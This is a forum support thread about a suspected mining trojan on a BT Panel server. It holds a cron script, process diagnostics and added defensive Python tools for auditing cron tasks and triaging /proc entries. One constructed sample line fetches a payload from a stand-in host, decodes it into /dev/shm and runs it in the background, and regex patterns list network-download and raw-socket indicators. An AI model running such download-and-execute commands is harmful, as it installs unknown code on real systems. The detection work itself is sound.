[Answered] BT Panel (宝塔) BUG: server infected with a trojan
To help us quickly understand and handle your issue, please provide the following basic information:
Panel and plugin version: latest, 11.4.*. After the server was compromised, a mining program keeps running.
System version:
Ubuntu 22.4
Problem description:
A random script is created in /www/server/cron: a mining trojan with a 32-character random name, disguised as the certificate renewal script:
/www/server/cron/3ab48c27ec99cb9787749c362afae517
together with a matching log file:
/www/server/cron/3ab48c27ec99cb9787749c362afae517.log
Contents of the script /www/server/cron/3ab48c27ec99cb9787749c362afae517:
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
echo $$ > /www/server/cron/3ab48c27ec99cb9787749c362afae517.pl
/www/server/panel/pyenv/bin/python3 -u /www/server/panel/class/acme_v2.py --renew_v2=1
echo "----------------------------------------------------------------------------"
endDate=`date +"%Y-%m-%d %H:%M:%S"`
echo "★[$endDate] Successful"
echo "----------------------------------------------------------------------------"
if [[ "$1" != "start" ]]; then
btpython /www/server/panel/script/log_task_analyzer.py /www/server/cron/3ab48c27ec99cb9787749c362afae517.log
fi
rm -f /www/server/cron/3ab48c27ec99cb9787749c362afae517.pl
Checked CPU usage:
================================================
进程资源监控与管理工具
================================================
正在分析系统资源占用情况...
CPU和内存占用TOP进程列表(CPU核心数: 8):
[编号] PID 用户 单核CPU% 总CPU% 内存% 实际内存 命令
--------------------------------------------------------------------------------------------------------------------
639664 root 12.4 99.3 0.0 1MB bash
A large number of bash processes appear and occupy all cores, yet still leave 20% idle...
More analysis:
root@myubuntu:~# ls -l /proc/639664/exe
lrwxrwxrwx 1 root root 0 Jan 23 18:31 /proc/639664/exe -> /bin/bash
root@myubuntu:~# cat /proc/639664/cmdline | tr '\0' ' '; echo
bash
root@myubuntu:~# ls -l /proc/639664/cwd
lrwxrwxrwx 1 root root 0 Jan 23 18:38 /proc/639664/cwd -> /
root@myubuntu:~# ps -o pid,ppid,cmd -p 639664
    PID    PPID CMD
 639664  638802 bash
root@myubuntu:~# lsof -p 639664
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF    NODE NAME
bash    639664 root  cwd    DIR   0,45     4096 3801182 /
bash    639664 root  rtd    DIR   0,45     4096 3801182 /
bash    639664 root  txt    REG   0,45   789472 3820483 /bin/bash
bash    639664 root  mem    REG   0,45          3821089 /usr/lib/libncursesw.so.6.6 (stat: No such file or directory)
bash    639664 root  mem    REG   0,45          3821107 /usr/lib/libreadline.so.8.3 (stat: No such file or directory)
bash    639664 root  mem    REG   0,45          3819533 /lib/ld-musl-x86_64.so.1 (stat: No such file or directory)
bash    639664 root    0r  FIFO   0,14      0t0 2820353 pipe
bash    639664 root    1u   CHR  136,0      0t0       3 /dev/pts/0
bash    639664 root    2u   CHR  136,0      0t0       3 /dev/pts/0
root@myubuntu:~# ss -tunlp | grep 639664
root@myubuntu:~# cat /proc/639664/environ | tr '\0' '\n' | grep -iE 'host|url|ip|port'
HOSTNAME=20ece9245879
WEBUI_PORT=8081
PS1=$(whoami)@$(hostname):$(pwd)\$
TORRENTING_PORT=6881
root@myubuntu:~# cp -r /proc/639664/cwd /tmp/suspect_bash_cwd_ $ (date +%s)
bash: syntax error near unexpected token `('
root@myubuntu:~# cat /proc/639664/cmdline | tr '\0' ' ' > /tmp/cmdline_639664.txt
root@myubuntu:~# ps -p 638802 -o cmd=
bash
root@myubuntu:~# crontab -l
LANG=en_US.UTF-8
LC_ALL=en_US.UTF-8
46 7 * * * /www/server/cron/3ab48c27ec99cb9787749c362afae517 >> /www/server/cron/3ab48c27ec99cb9787749c362afae517.log 2>&1
root@myubuntu:~# cat /etc/cron.d/*
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
# The first element of the path is a directory where the debian-sa1
# script is located
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
# Activity reports every 10 minutes everyday
5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
# Additional run at 23:59 to rotate the statistics file
59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
root@myubuntu:~# lsattr /var/spool/cron
--------------e------- /var/spool/cron/crontabs
--------------e------- /var/spool/cron/atjobs
--------------e------- /var/spool/cron/atspool
root@myubuntu:~# ls /etc/rc.d/init.d/
ls: cannot access '/etc/rc.d/init.d/': No such file or directory
root@myubuntu:~#
Related screenshots (logs, errors):
Log contents:
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
|-正在续签第 1 张证书,共 2 张..
|-【a74a3271496061ce61218fa548b6c41f】未到续签时间,下次续签:2026-02-06
|-正在续签第 2 张证书,共 2 张..
|-【cf8aedb523bb145141aaf23e8b8c429b】未到续签时间,下次续签:2026-02-06
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
|-正在续签第 1 张证书,共 3 张..
|-【a74a3271496061ce61218fa548b6c41f】未到续签时间,下次续签:2026-02-06
|-正在续签第 2 张证书,共 3 张..
|-【cf8aedb523bb145141aaf23e8b8c429b】未到续签时间,下次续签:2026-02-06
|-正在续签第 3 张证书,共 3 张..
|-【d3b318dac9c02e84dc257aaae5b25fee】未到续签时间,下次续签:2026-03-23
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
|-正在续签第 1 张证书,共 3 张..
|-【a74a3271496061ce61218fa548b6c41f】未到续签时间,下次续签:2026-02-06
|-正在续签第 2 张证书,共 3 张..
|-【cf8aedb523bb145141aaf23e8b8c429b】未到续签时间,下次续签:2026-02-06
|-正在续签第 3 张证书,共 3 张..
|-【d3b318dac9c02e84dc257aaae5b25fee】未到续签时间,下次续签:2026-03-23
----------------------------------------------------------------------------
★ Successful
----------------------------------------------------------------------------
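A defender's first question about a file like this is whether it differs from the renewal task the panel writes itself. The following audit is an added example, not code from the post and not shipped by 宝塔: it parses `crontab -l` output for scripts under /www/server/cron, runs a small set of constructed heuristics over each body (network download, base64 decoding, execution from a temp directory, raw /dev/tcp sockets, backgrounding, persistence changes) and computes a SHA-256 so the same task can be compared against a clean server or a backup. Run against the script quoted in the post it raises nothing, which matches what the script actually does: it only invokes the panel's own acme_v2.py and log_task_analyzer.py. The heuristics and the contrasting suspicious body (pointing at an unreachable .invalid host) are constructed for the demo.

```python
import hashlib
import re

# One crontab job line: five schedule fields, then the command. (/etc/cron.d files add a
# user field after the schedule; this parser targets `crontab -l` output as in the post.)
CRON_LINE = re.compile(r"^((?:\S+\s+){5})(.*)$")
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")

# Heuristics a defender applies to a script that claims to be a renewal task. These are
# constructed for this example and are not a signature set shipped by the panel.
INDICATORS = [
    ("downloads from the network", re.compile(r"\b(curl|wget)\b")),
    ("decodes an embedded payload", re.compile(r"base64\s+(-d|--decode)\b")),
    ("executes or writes under a temp directory", re.compile(r"(/tmp|/dev/shm|/var/tmp)/\S+")),
    ("opens a raw TCP connection from bash", re.compile(r"/dev/tcp/")),
    ("detaches a background process", re.compile(r"\b(nohup|setsid)\b|&\s*$", re.MULTILINE)),
    ("rewrites persistence", re.compile(r"crontab\s+-|/etc/rc\.local|systemctl\s+enable")),
]


def parse_crontab(text):
    """Return (schedule, command) tuples, skipping blanks, comments and env assignments."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group(1).strip(), m.group(2).strip()))
    return jobs


def referenced_scripts(jobs, prefix="/www/server/cron/"):
    """Scripts under the panel's cron directory named in job commands (ordered, unique)."""
    found = []
    for _schedule, command in jobs:
        for token in command.split():
            path = token.lstrip(">")  # tolerate a redirection glued to the path, as in ">>/x"
            if path.startswith(prefix) and not path.endswith(".log") and path not in found:
                found.append(path)
    return found


def audit_script(content):
    """Names of the indicators that fire on a script body; empty means nothing stood out."""
    return [name for name, pattern in INDICATORS if pattern.search(content)]


def fingerprint(content):
    """SHA-256 of the body, so the same task can be compared across servers or against a backup."""
    return hashlib.sha256(content.encode()).hexdigest()


# Constructed inputs for the demo: the crontab line and script body quoted in the post,
# and an obviously suspicious body (unreachable .invalid host) for contrast.
SAMPLE_CRONTAB = """LANG=en_US.UTF-8
LC_ALL=en_US.UTF-8
46 7 * * * /www/server/cron/3ab48c27ec99cb9787749c362afae517 >> /www/server/cron/3ab48c27ec99cb9787749c362afae517.log 2>&1
"""

POSTED_SCRIPT = """#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
echo $$ > /www/server/cron/3ab48c27ec99cb9787749c362afae517.pl
/www/server/panel/pyenv/bin/python3 -u /www/server/panel/class/acme_v2.py --renew_v2=1
echo "----------------------------------------------------------------------------"
endDate=`date +"%Y-%m-%d %H:%M:%S"`
echo "★[$endDate] Successful"
echo "----------------------------------------------------------------------------"
if [[ "$1" != "start" ]]; then
btpython /www/server/panel/script/log_task_analyzer.py /www/server/cron/3ab48c27ec99cb9787749c362afae517.log
fi
rm -f /www/server/cron/3ab48c27ec99cb9787749c362afae517.pl
"""

SUSPICIOUS_SCRIPT = """#!/bin/bash
curl -fsSL http://example.invalid/u | base64 -d > /dev/shm/.c
nohup /dev/shm/.c >/dev/null 2>&1 &
"""


def demo():
    """Run the audit over the constructed inputs and return the findings."""
    scripts = referenced_scripts(parse_crontab(SAMPLE_CRONTAB))
    return {
        "scripts": scripts,
        "posted": audit_script(POSTED_SCRIPT),
        "suspicious": audit_script(SUSPICIOUS_SCRIPT),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Indicators are hints, not verdicts: a benign task may download, and a malicious one may stage its payload elsewhere. In the post the CPU consumers are bash processes whose parent is another bash, which this cron script does not explain on its own, so the running processes have to be triaged separately from the cron text.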
Is nobody going to look at this?
Is nobody going to look at this?
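The process-side checks in the post (exe, cwd, cmdline, ppid, environ, lsof) can be gathered in one pass from /proc. The following is an added example, not code from the post or from the panel. Beyond collecting those facts it compares the process's mount namespace with PID 1's and checks whether each file in /proc/PID/maps exists in the host's view of the filesystem. That is what lsof's `(stat: No such file or directory)` against /lib/ld-musl-x86_64.so.1 means on an Ubuntu host: the process sees a root filesystem other than the host's, typically a container. The `proc` and `root` parameters, the namespace ids, the cgroup path and the `build_demo_tree` helper are constructed so the demo runs offline on a tree modelled on the post's output.

```python
import os
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# The post's grep over the environment, applied to "KEY=value"; cgroup fragments of common runtimes.
ENV_FILTER = re.compile(r"host|url|ip|port", re.IGNORECASE)
RUNTIME_CGROUP = re.compile(r"docker|containerd|kubepods|libpod|lxc", re.IGNORECASE)


def _read(path, link=False):
    """Read a /proc entry (the symlink target if link=True); "" if it vanished or is unreadable."""
    try:
        return os.readlink(path) if link else Path(path).read_bytes().decode("utf-8", "replace")
    except OSError:
        return ""


@dataclass
class Triage:
    pid: int
    ppid: int
    exe: str
    cwd: str
    cmdline: list
    env: dict
    cgroup: str
    own_mnt_ns: str
    init_mnt_ns: str
    unresolvable_maps: list

    def indicators(self):
        """Reasons to believe the process does not share the host's root filesystem."""
        hits = []
        if self.own_mnt_ns != self.init_mnt_ns:
            hits.append("mount namespace differs from PID 1")
        if RUNTIME_CGROUP.search(self.cgroup):
            hits.append("container runtime named in cgroup")
        if self.unresolvable_maps:
            hits.append("%d mapped file(s) do not exist in the host view" % len(self.unresolvable_maps))
        if re.fullmatch(r"[0-9a-f]{12}", self.env.get("HOSTNAME", "")):
            hits.append("HOSTNAME looks like a short container id")
        return hits

    def interesting_env(self):
        """Environment entries matching the post's grep, e.g. HOSTNAME and *_PORT."""
        return {k: v for k, v in self.env.items() if ENV_FILTER.search(k + "=" + v)}


def triage(pid, proc="/proc", root="/"):
    """Gather from /proc what the post collected by hand; proc/root are overridable for the demo."""
    base = os.path.join(proc, str(pid))
    cmdline = [a for a in _read(os.path.join(base, "cmdline")).split("\0") if a]
    env = dict(e.split("=", 1) for e in _read(os.path.join(base, "environ")).split("\0") if "=" in e)
    ppid = 0
    for line in _read(os.path.join(base, "status")).splitlines():
        if line.startswith("PPid:"):
            ppid = int(line.split()[1])
    # lsof prints "(stat: No such file or directory)" for a mapped file that exists in the
    # process's mount namespace but not in the host's; reproduce that check from /proc/PID/maps.
    unresolvable = []
    for line in _read(os.path.join(base, "maps")).splitlines():
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[5].startswith("/") and fields[5] not in unresolvable:
            if not os.path.exists(os.path.join(root, fields[5].lstrip("/"))):
                unresolvable.append(fields[5])
    return Triage(pid, ppid, _read(os.path.join(base, "exe"), link=True),
                  _read(os.path.join(base, "cwd"), link=True), cmdline, env,
                  _read(os.path.join(base, "cgroup")).strip(),
                  _read(os.path.join(base, "ns", "mnt"), link=True),
                  _read(os.path.join(proc, "1", "ns", "mnt"), link=True), unresolvable)


def build_demo_tree(root):
    """Constructed /proc-like tree: values from the post, namespace ids and cgroup path invented."""
    proc = os.path.join(root, "proc")
    p = os.path.join(proc, "639664")
    os.makedirs(os.path.join(proc, "1", "ns"))
    os.makedirs(os.path.join(p, "ns"))
    os.symlink("mnt:[4026531840]", os.path.join(proc, "1", "ns", "mnt"))
    os.symlink("mnt:[4026532655]", os.path.join(p, "ns", "mnt"))
    os.symlink("/bin/bash", os.path.join(p, "exe"))
    os.symlink("/", os.path.join(p, "cwd"))
    files = {
        "cmdline": b"bash\0",
        "environ": b"HOSTNAME=20ece9245879\0WEBUI_PORT=8081\0PS1=$(whoami)@$(hostname):$(pwd)\\$\0TORRENTING_PORT=6881\0",
        "status": b"Name:\tbash\nPPid:\t638802\n",
        "maps": b"7f0000000000-7f0000001000 r--p 00000000 00:2d 3819533 /lib/ld-musl-x86_64.so.1\n",
        "cgroup": b"0::/system.slice/docker-constructed.scope\n",
    }
    for name, data in files.items():
        Path(p, name).write_bytes(data)
    return proc


def demo():
    """Triage the constructed process; root=tmp makes the mapped musl loader unresolvable."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage(639664, proc=build_demo_tree(tmp), root=tmp)
```

On the live host, `triage(639664)` reads the real /proc. If the indicators fire, the next step is to map the PID to its container (the Docker cgroup path carries the container id) rather than to the panel's cron directory. Note also that `ss -tunlp` lists listening sockets only (`-l`), so an outbound connection from the process would not appear in that output; `ss -tunp` shows established connections as well.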
The panel has not received any vulnerability report. Our company has always attached great importance to security; we previously deposited 100,000 yuan on the Butian platform (https://www.butian.net/Company/60392) as an incentive for vulnerability reports.
If you need security operations services, you can contact our security operations account manager,
who can assist with the investigation.